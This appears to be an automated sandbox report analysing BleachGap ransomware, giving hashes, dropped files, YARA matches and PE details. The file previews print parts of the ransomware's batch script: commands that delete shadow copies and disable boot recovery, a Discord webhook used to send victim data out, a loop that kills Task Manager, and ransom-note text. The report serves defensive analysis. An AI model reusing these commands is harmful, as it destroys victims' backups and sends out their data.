                          https://discord.com/api(WMIC.exe, 00000018.00000003.271615545.00000196AAA2F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious

                          Private

                          IP
                          192.168.2.1

                          General Information

                          Joe Sandbox Version:32.0.0 Black Diamond
                          Analysis ID:414396
                          Start date:14.05.2021
                          Start time:17:26:17
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 10m 15s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:53c0505a_by_Libranalysis (renamed file extension from none to exe)
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:40
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.rans.adwa.spyw.evad.winEXE@1706/21@0/1
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 99.7% (good quality ratio 93.1%)
                          • Quality average: 82.7%
                          • Quality standard deviation: 29.3%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          Warnings:
                          Show All
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • Report size getting too big, too many NtWriteVirtualMemory calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          17:27:11API Interceptor3x Sleep call for process: WMIC.exe modified
                          17:27:13AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe
                          17:27:44Task SchedulerRun new task: UpdateWuauclt path: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe
                          17:27:46Task SchedulerRun new task: UpdateWuaucltHelper path: C:\Users\user~1\AppData\Local\Temp\del\delfile.bat

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASN

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          C:\Users\user\AppData\Local\Temp\539A.tmp\aescrypt.exehztxqReczN.exeGet hashmaliciousBrowse
                            BleachGap.exeGet hashmaliciousBrowse
                              SuperEnjoy.exeGet hashmaliciousBrowse
                                C:\Users\user\AppData\Local\Temp\19BE.tmp\aescrypt.exehztxqReczN.exeGet hashmaliciousBrowse
                                  BleachGap.exeGet hashmaliciousBrowse
                                    SuperEnjoy.exeGet hashmaliciousBrowse

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat
                                      Process:C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe
                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):9228
                                      Entropy (8bit):5.4771640376959425
                                      Encrypted:false
                                      SSDEEP:192:9VvN2uhPmgYvnkyp4mwiqAKWd1V4SHfaS:97xhnPypgA5SbS
                                      MD5:834E3C3445431C7DAAE8978423BA7E08
                                      SHA1:5CB611ABA47FB91EF75F090C289DEDFB506944B1
                                      SHA-256:B131AABCCECD99A910197DFEFCD14D695E902E016F7F9EED819655EFE839546C
                                      SHA-512:9E2354A9C4798515FBFCFADB9F99006AD018B4BF9D31F6A24D1F39415877C73735D18B02D58832193CD7830FFD7CE47F227BBCE70FE54268C59F3DE992C0D959
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat, Author: Joe Security
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat, Author: Joe Security
                                      Preview: @shift /0..@echo off..:: BAT/Ransom.BleachGap..:: In five minutes you'll already be crying, after 10 mins you're trying to drink bleach...:: New 1.1 BleachGap, with sincerest love to all those has researched for this ransomware...set "startup=%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"..copy /b /y %0 "%startup%"..setlocal enableextensions enabledelayedexpansion..cd /D %tmp%..if "%1"=="" (..set "webhook=https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4Oxsl3mhENe1z-2LnuDG2SdDlu_mYUnpz7MHY6s"..) else (..set "webhook=%1"..)..wmic shadowcopy delete..vssadmin delete shadows /all /quiet..bcdedit /set {current} optionsedit off..bcdedit /set {current} advancedoptions off..bcdedit /set {current} bootems no..bcdedit /set {default} recoveryenabled no..bcdedit /set {default} bootstatuspolicy ignoreallfailures..wmic os get caption | findstr /I /C:"10"..netsh advfirewall firewall add rule name="Micorosoft Windows Update" dir=in action=allow program="%0" e
                                      C:\Users\user\AppData\Local\Temp\19BE.tmp\aescrypt.exe
                                      Process:C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):144384
                                      Entropy (8bit):6.805779966193588
                                      Encrypted:false
                                      SSDEEP:3072:NgzEhDpHGk/gqrYxgHNEt3koN0Shi76u7:NiEhNHgqrLme+i
                                      MD5:82FF688AA9253B356E5D890FF311B59E
                                      SHA1:4A143FC08B6A55866403966918026509BEFCC7C1
                                      SHA-256:B68FC901D758BA9EA3A5A616ABD34D1662197AA31B502F27CBF2579A947E53E9
                                      SHA-512:CBB3D81E3237B856E158C5F38F84230A50F913BDADA0EF37B679E27E7DDF3C970173B68D2415DD8A7377BA543206BB8E0FE77C61334B47C5684E3DDFFF86ACED
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: C:\Users\user\AppData\Local\Temp\19BE.tmp\aescrypt.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Metadefender, Detection: 21%, Browse
                                      • Antivirus: ReversingLabs, Detection: 21%
                                      Joe Sandbox View:
                                      • Filename: hztxqReczN.exe, Detection: malicious, Browse
                                      • Filename: BleachGap.exe, Detection: malicious, Browse
                                      • Filename: SuperEnjoy.exe, Detection: malicious, Browse
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............d..d..d.A...d.A...d.A..7.d.....d..e...d.....d.A...d.A...d.A...d.Rich..d.........................PE..L...P.1U.................$...................@....@.................................N.....@..................................p..<...............................p...pA...............................k..@............@..0............................text...J#.......$.................. ..`.rdata...7...@...8...(..............@..@.data... g...........`..............@....rsrc................p..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Temp\19BE.tmp\winhttpjs.bat
                                      Process:C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):19991
                                      Entropy (8bit):4.520196997981659
                                      Encrypted:false
                                      SSDEEP:384:7FzaFcLh00gi6CSKaHs8/hyiYC0NE36LUvfTTJigi0ps/+7oHkmGyvhcCeDvVbbS:h93g/LHsw8xECAbbS
                                      MD5:1539FC9490DEA1E12E59D891465A6EEC
                                      SHA1:B7C22E32B92ABD59B4B51974266F54A17829EF34
                                      SHA-256:879960FD8C45BA4DE0648A3DC89E204A12D0978D662EDC4BCE8E0C4A6B6902C2
                                      SHA-512:11FEF6A6856F764BDDD8972E2EE5A5858CEBF94F8AF04507F04886DDB4236079550CA3C00C0BE86F920139D99951C96E12A5B0155E3DCCCEC27ED5EA2DADE845
                                      Malicious:false
                                      Preview: @if (@X) == (@Y) @end /* JScript comment . @echo off . . rem :: the first argument is the script name as it will be used for proper help message . cscript //E:JScript //nologo "%~f0" "%~nx0" %* .. exit /b %errorlevel% . .@if (@X)==(@Y) @end JScript comment */..// used resources..// update 12.10.15 .// osvikvi(https://github.com/osvikvi) has nodited that the -password option is not set , so this is fixed..//https://msdn.microsoft.com/en-us/library/windows/desktop/aa384058(v=vs.85).aspx .//https://msdn.microsoft.com/en-us/library/windows/desktop/aa384055(v=vs.85).aspx .//https://msdn.microsoft.com/en-us/library/windows/desktop/aa384059(v=vs.85).aspx ..// global variables and constants ...// ---------------------------------- .// -- asynch requests not included -- .// ---------------------------------- ...//todo - save responceStream instead of responceBody !! .//todo - set all winthttp options ->//https://msdn.microsoft.com/en-us/library/windows/
                                      C:\Users\user\AppData\Local\Temp\539A.tmp\539B.tmp\539C.bat
                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe
                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):9228
                                      Entropy (8bit):5.4771640376959425
                                      Encrypted:false
                                      SSDEEP:192:9VvN2uhPmgYvnkyp4mwiqAKWd1V4SHfaS:97xhnPypgA5SbS
                                      MD5:834E3C3445431C7DAAE8978423BA7E08
                                      SHA1:5CB611ABA47FB91EF75F090C289DEDFB506944B1
                                      SHA-256:B131AABCCECD99A910197DFEFCD14D695E902E016F7F9EED819655EFE839546C
                                      SHA-512:9E2354A9C4798515FBFCFADB9F99006AD018B4BF9D31F6A24D1F39415877C73735D18B02D58832193CD7830FFD7CE47F227BBCE70FE54268C59F3DE992C0D959
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: C:\Users\user\AppData\Local\Temp\539A.tmp\539B.tmp\539C.bat, Author: Joe Security
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: C:\Users\user\AppData\Local\Temp\539A.tmp\539B.tmp\539C.bat, Author: Joe Security
                                      Preview: @shift /0..@echo off..:: BAT/Ransom.BleachGap..:: In five minutes you'll already be crying, after 10 mins you're trying to drink bleach...:: New 1.1 BleachGap, with sincerest love to all those has researched for this ransomware...set "startup=%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"..copy /b /y %0 "%startup%"..setlocal enableextensions enabledelayedexpansion..cd /D %tmp%..if "%1"=="" (..set "webhook=https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4Oxsl3mhENe1z-2LnuDG2SdDlu_mYUnpz7MHY6s"..) else (..set "webhook=%1"..)..wmic shadowcopy delete..vssadmin delete shadows /all /quiet..bcdedit /set {current} optionsedit off..bcdedit /set {current} advancedoptions off..bcdedit /set {current} bootems no..bcdedit /set {default} recoveryenabled no..bcdedit /set {default} bootstatuspolicy ignoreallfailures..wmic os get caption | findstr /I /C:"10"..netsh advfirewall firewall add rule name="Micorosoft Windows Update" dir=in action=allow program="%0" e
                                      C:\Users\user\AppData\Local\Temp\539A.tmp\aescrypt.exe
                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):144384
                                      Entropy (8bit):6.805779966193588
                                      Encrypted:false
                                      SSDEEP:3072:NgzEhDpHGk/gqrYxgHNEt3koN0Shi76u7:NiEhNHgqrLme+i
                                      MD5:82FF688AA9253B356E5D890FF311B59E
                                      SHA1:4A143FC08B6A55866403966918026509BEFCC7C1
                                      SHA-256:B68FC901D758BA9EA3A5A616ABD34D1662197AA31B502F27CBF2579A947E53E9
                                      SHA-512:CBB3D81E3237B856E158C5F38F84230A50F913BDADA0EF37B679E27E7DDF3C970173B68D2415DD8A7377BA543206BB8E0FE77C61334B47C5684E3DDFFF86ACED
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: C:\Users\user\AppData\Local\Temp\539A.tmp\aescrypt.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Metadefender, Detection: 21%, Browse
                                      • Antivirus: ReversingLabs, Detection: 21%
                                      Joe Sandbox View:
                                      • Filename: hztxqReczN.exe, Detection: malicious, Browse
                                      • Filename: BleachGap.exe, Detection: malicious, Browse
                                      • Filename: SuperEnjoy.exe, Detection: malicious, Browse
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............d..d..d.A...d.A...d.A..7.d.....d..e...d.....d.A...d.A...d.A...d.Rich..d.........................PE..L...P.1U.................$...................@....@.................................N.....@..................................p..<...............................p...pA...............................k..@............@..0............................text...J#.......$.................. ..`.rdata...7...@...8...(..............@..@.data... g...........`..............@....rsrc................p..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Temp\539A.tmp\winhttpjs.bat
                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):19991
                                      Entropy (8bit):4.520196997981659
                                      Encrypted:false
                                      SSDEEP:384:7FzaFcLh00gi6CSKaHs8/hyiYC0NE36LUvfTTJigi0ps/+7oHkmGyvhcCeDvVbbS:h93g/LHsw8xECAbbS
                                      MD5:1539FC9490DEA1E12E59D891465A6EEC
                                      SHA1:B7C22E32B92ABD59B4B51974266F54A17829EF34
                                      SHA-256:879960FD8C45BA4DE0648A3DC89E204A12D0978D662EDC4BCE8E0C4A6B6902C2
                                      SHA-512:11FEF6A6856F764BDDD8972E2EE5A5858CEBF94F8AF04507F04886DDB4236079550CA3C00C0BE86F920139D99951C96E12A5B0155E3DCCCEC27ED5EA2DADE845
                                      Malicious:false
                                      Preview: @if (@X) == (@Y) @end /* JScript comment . @echo off . . rem :: the first argument is the script name as it will be used for proper help message . cscript //E:JScript //nologo "%~f0" "%~nx0" %* .. exit /b %errorlevel% . .@if (@X)==(@Y) @end JScript comment */..// used resources..// update 12.10.15 .// osvikvi(https://github.com/osvikvi) has nodited that the -password option is not set , so this is fixed..//https://msdn.microsoft.com/en-us/library/windows/desktop/aa384058(v=vs.85).aspx .//https://msdn.microsoft.com/en-us/library/windows/desktop/aa384055(v=vs.85).aspx .//https://msdn.microsoft.com/en-us/library/windows/desktop/aa384059(v=vs.85).aspx ..// global variables and constants ...// ---------------------------------- .// -- asynch requests not included -- .// ---------------------------------- ...//todo - save responceStream instead of responceBody !! .//todo - set all winthttp options ->//https://msdn.microsoft.com/en-us/library/windows/
                                      C:\Users\user\AppData\Local\Temp\body.json
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):839
                                      Entropy (8bit):4.917107608639251
                                      Encrypted:false
                                      SSDEEP:24:YV89SGe8bFR0ivKixgL89SQe8q6ivKixgWF9U:YVPGe8P7gLPQe8qtg1
                                      MD5:62476EEC6CA751D3BCE2E181D0913E2A
                                      SHA1:FAE3EC95612ED97C5006A169967B2A4F210BE328
                                      SHA-256:756770233A451D47FA7F9E122BB82D4415F26330E3B58A67BD7B253C9FF7C3C4
                                      SHA-512:1E713F2885F1F6B1BFE2659DA9FD3B27B06239C8EA9D76B8DAA73450E61A7A1C95FE305B31CD7F2495597D41993052A07E0F2A02F398D859E4BEC5FA571FA3B1
                                      Malicious:false
                                      Preview: {"username": "BleachGap 1.1","avatar_url": "https://i.imgur.com/a2t88yx.png","content": "","embeds": [{"title": "New Crypted PC","color": 0,"description": "Bleach Gap new execute, waiting for 2nd embed.","timestamp": "","url": "","author": {"name": "Hacker$quad","url": "","icon_url": ""},"image": {},"thumbnail": {},"footer": {"text": ""},"fields": [{"name": "Date: 14\05\2021","value": "Time: 17.27.39", "inline": false}]}]}..{"username": "BleachGap 1.1","avatar_url": "https://i.imgur.com/a2t88yx.png","content": "","embeds": [{"title": "Crypted PC","color": 0,"description": " - BleachGap","timestamp": "","url": "","author": {"name": "Hacker$quad","url": "","icon_url": ""},"image": {},"thumbnail": {},"footer": {"text": ""},"fields": [{"name": "IP: 84.17.52.78","value": "Infected: computer_user", "inline": false}]}]}..
                                      C:\Users\user\AppData\Local\Temp\headers
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:application/json , ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):4.116729296672174
                                      Encrypted:false
                                      SSDEEP:3:/eIeARdMQUWKLSeIeARdMQUWKLSv:/eQRy7QRyc
                                      MD5:3DE9A9F88A901403E2A42C79EC285B5D
                                      SHA1:6A075AEAC6BDEB58487A10D5F0E30BFC68FD7639
                                      SHA-256:22D6CFAF73447D0F4B94F3532178A333F8E14CC49186958AE4CCA9E78F9C72AA
                                      SHA-512:53DC036084C632A3DD91E2C50F77E0CC575295FD0F15428C863AEB28D3298E82D0D9901170711FEFCFCEC4D79697AC5F3BB44F10081852AE1A4AC7E364E231E2
                                      Malicious:false
                                      Preview: Content-Type:application/json ..Content-Type:application/json ..
                                      C:\Users\user\AppData\Local\Temp\kill.bat
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):47
                                      Entropy (8bit):4.035778681778613
                                      Encrypted:false
                                      SSDEEP:3:uR/hnWrEJfLACsHImv:eZWrEJf0doY
                                      MD5:350C3947AFE1FB48A6D670452A533EF3
                                      SHA1:46444FD4F40316E21613A21C1E7780068280F3BD
                                      SHA-256:E81726F187D80C2366467FCFCFE9BB0F4D5151D859DEA540F3B39DD3CE07A42C
                                      SHA-512:A2D80F1EF85B1B16428B3B260B7C5391D9D58D05F542F0D75E020D9AABF9B62964B010D150093D0C920705A879C7E14DCA723BE1F8AD77B7529895F524BE0286
                                      Malicious:false
                                      Preview: :kill..taskkill /f /im taskmgr.exe..goto kill..
                                      C:\Users\user\AppData\Local\Temp\p2d.bat
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):973
                                      Entropy (8bit):5.664074805932216
                                      Encrypted:false
                                      SSDEEP:24:QUbq8Nx1n1dP6rr1n13m3KWLs1n1CCEb1n1Yj17:QUW8Nx1n1dirr1n1cKes1n1Kb1n1Q17
                                      MD5:2BB70D1234DC28697A70684A6A85059F
                                      SHA1:01BA36236339B20F3E2827D7FECA29FD72DFCADA
                                      SHA-256:5CC46529E834E945D50B27F173147E1967B52D51C146B0AC1CEE3EF2F4BC8CAE
                                      SHA-512:D56B6078166B84F217B041DF92790FA65742247390A8E02C0B9DEFAFD29EA99895A971054FDFEFBDBD4B2591E23151090AEB8DB27C66163FF5DF897177B8DC14
                                      Malicious:false
                                      Preview: for /l %%l in (1,1,100) do (..echo DONT TRY TO REBOOT, YOUR FILES ARE ENCRYPTED>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo.>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo JOIN TO OUR DISCORD SERVER: https://discord.gg/E8dgPKsmrb, IF YOU DON'T HAVE DISCORD EMAIL US IN nekez@discard.email>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo.>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo SEND US A MESSAGE WITH YOUR PERSONAL KEY:8v6592BQ9Zv45H2ZWl6A9OWed79GtPmLq74DKjr72q1qlEhBYp4G4J9j7JxN2Bq20rE1OV5BRk4aw1p3nUJQ8j0vK2WSBd4WTODWNWeecCBeHRX19HGQW5Fl0l296XT8>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo.>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo YOU HAVE 5 DAYS TO PAY OUR EXIGENCES, IF NOT, YOUR FILES WILL BE DELETED>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo.>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..echo THE TIME START NOW: 14\05\2021>>C:\Users\user\Desktop\Pay2Decrypt%%l.txt..)..start Pay2Decrypt1.txt..
                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):752128
                                      Entropy (8bit):5.110135187846947
                                      Encrypted:false
                                      SSDEEP:12288:g5atNTp/0h0xnsdvVUxPVnWjEhsnEw6molM:g5QTpZsEwZD
                                      MD5:53C0505AFE3B2BF43C5724B954DA464C
                                      SHA1:20BC975D529FAC15B2C848E8A451A9E53F861E8B
                                      SHA-256:C625F2B67DCCFB06BA5A092523C72FA5014589395E16E7509A09144008CE5EE0
                                      SHA-512:4196E7B88E4681AC7977CB473C65B1752E398A8AC98282485F2B5E6E65A7EF0E44B581F6C2A147FCBEECD514C57DB210CDD64C734DEC394E8B0BDBC97408EF53
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 47%
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....d...............0....@.........................................................................lq..........t............................................................................................................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc...t............\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe:Zone.Identifier
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview: [ZoneTransfer]....ZoneId=0
                                      \Device\ConDrv
                                      Process:C:\Windows\System32\wbem\WMIC.exe
                                      File Type:ASCII text, with CRLF, CR line terminators
                                      Category:dropped
                                      Size (bytes):28
                                      Entropy (8bit):4.208966082694623
                                      Encrypted:false
                                      SSDEEP:3:nLWGWNI3ov:nyGWNOov
                                      MD5:F2CE4C29DC78D5906090690C345EAF80
                                      SHA1:D12E3B86380F0DBEF4FBDFFE2CBFE2144FB7E9CD
                                      SHA-256:0356A869FC7E6495BAC33303B002935C317166D0EA5D403BE162573CF01055D8
                                      SHA-512:51F939C41710BC3A4E443CDAF33AAE614B043ACC2382A0C836049E34D2F51C8195FD149548752B33E4EDD4299548BB1957B89997FC640C837C9400D76FEA5B74
                                      Malicious:false
                                      Preview: No Instance(s) Available....

                                      Static File Info

                                      General

                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                      Entropy (8bit):5.110135187846947
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • VXD Driver (31/22) 0.00%
                                      File name:53c0505a_by_Libranalysis.exe
                                      File size:752128
                                      MD5:53c0505afe3b2bf43c5724b954da464c
                                      SHA1:20bc975d529fac15b2c848e8a451a9e53f861e8b
                                      SHA256:c625f2b67dccfb06ba5a092523c72fa5014589395e16e7509a09144008ce5ee0
                                      SHA512:4196e7b88e4681ac7977cb473c65b1752e398a8ac98282485f2b5e6e65a7ef0e44b581f6c2a147fcbeecd514c57db210cdd64c734dec394e8b0bdbc97408ef53
                                      SSDEEP:12288:g5atNTp/0h0xnsdvVUxPVnWjEhsnEw6molM:g5QTpZsEwZD
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....d...............0....@........................................................................

                                      File Icon

                                      Icon Hash:4e93292c6d653d79

                                      Static PE Info

                                      General

                                      Entrypoint:0x401000
                                      Entrypoint Section:.code
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows cui
                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                      DLL Characteristics:
                                      Time Stamp:0x5A7375FD [Thu Feb 1 20:18:05 2018 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:92726b1f55f5ecd5b5fcbde6cf170336

                                      Entrypoint Preview

                                      Instruction
                                      push 000000ACh
                                      push 00000000h
                                      push 00418068h
                                      call 00007F6CB0A07751h
                                      add esp, 0Ch
                                      push 00000000h
                                      call 00007F6CB0A0774Ah
                                      mov dword ptr [0041806Ch], eax
                                      push 00000000h
                                      push 00001000h
                                      push 00000000h
                                      call 00007F6CB0A07737h
                                      mov dword ptr [00418068h], eax
                                      call 00007F6CB0A076B1h
                                      mov eax, 00417078h
                                      mov dword ptr [0041808Ch], eax
                                      call 00007F6CB0A10B12h
                                      call 00007F6CB0A1087Ah
                                      call 00007F6CB0A0D758h
                                      call 00007F6CB0A0CFDCh
                                      call 00007F6CB0A0CA6Fh
                                      call 00007F6CB0A0C7E9h
                                      call 00007F6CB0A0BC8Dh
                                      call 00007F6CB0A0B40Dh
                                      call 00007F6CB0A07A2Fh
                                      call 00007F6CB0A0F3D8h
                                      call 00007F6CB0A0DE80h
                                      mov edx, 0041702Ah
                                      lea ecx, dword ptr [00418074h]
                                      call 00007F6CB0A076C8h
                                      push FFFFFFF5h
                                      call 00007F6CB0A076D8h
                                      mov dword ptr [00418094h], eax
                                      mov eax, 00000200h
                                      push eax
                                      lea eax, dword ptr [00418110h]
                                      push eax
                                      xor eax, eax
                                      push eax
                                      push 00000015h
                                      push 00000004h
                                      call 00007F6CB0A0CA32h
                                      push dword ptr [004180F8h]

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1716c0xc8.data
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000xa1c74.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .code0x10000x387e0x3a00False0.459523168103data5.52796946819IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .text0x50000xd6420xd800False0.51195384838data6.54614983042IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rdata0x130000x33a80x3400False0.8046875data7.11033437291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x170000x178c0x1200False0.361979166667data4.79599281167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                      .rsrc0x190000xa1c740xa1e00False0.228518641409data4.70573874186IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0x195a40x42028data
                                      RT_ICON0x5b5cc0x25228data
                                      RT_ICON0x807f40x10828data
                                      RT_ICON0x9101c0x94a8data
                                      RT_ICON0x9a4c40x4228data
                                      RT_ICON0x9e6ec0x25a8data
                                      RT_ICON0xa0c940x10a8data
                                      RT_ICON0xa1d3c0x988data
                                      RT_ICON0xa26c40x468GLS_BINARY_LSB_FIRST
                                      RT_RCDATA0xa2b2c0x1very short file (no magic)
                                      RT_RCDATA0xa2b300x10data
                                      RT_RCDATA0xa2b400x14774data
                                      RT_RCDATA0xb72b40x2402data
                                      RT_RCDATA0xb96b80x5edata
